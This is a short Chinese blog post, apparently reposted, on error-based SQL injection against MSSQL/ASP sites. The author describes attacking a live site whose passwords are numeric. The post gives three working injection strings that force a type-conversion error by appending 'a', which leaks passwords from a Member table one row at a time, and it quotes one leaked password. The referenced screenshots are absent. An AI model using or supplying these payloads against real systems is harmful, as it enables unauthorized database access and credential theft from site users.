MSSQL报错注入爆数字型的小思路 - 网站安全 - 自学

MSSQL+ASP

最近在弄个站点，密码是纯数字的，convert(int,())转换出来不报错，也不知道其他人用的什么函数或者类型来爆密码像]11111111″的这样的数据的,就自己想了下弄了个暂时可以用的方法.

数据库查询如图:

图一：

图二：

图三：

图四：

图五：

下面是实验

表Member 字段Password

语句

‘ or 1=convert(int,(select top 1 password from Member))–

语句’ or 1=convert(int,(select top 1 password from member)+’a')–

然后查询下一条数据

语句’ or 1=convert(int,(select top 1 password from member where password not in (’117517450′))+’a')–

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13530

更新时间：2022-09-13 阅读：46次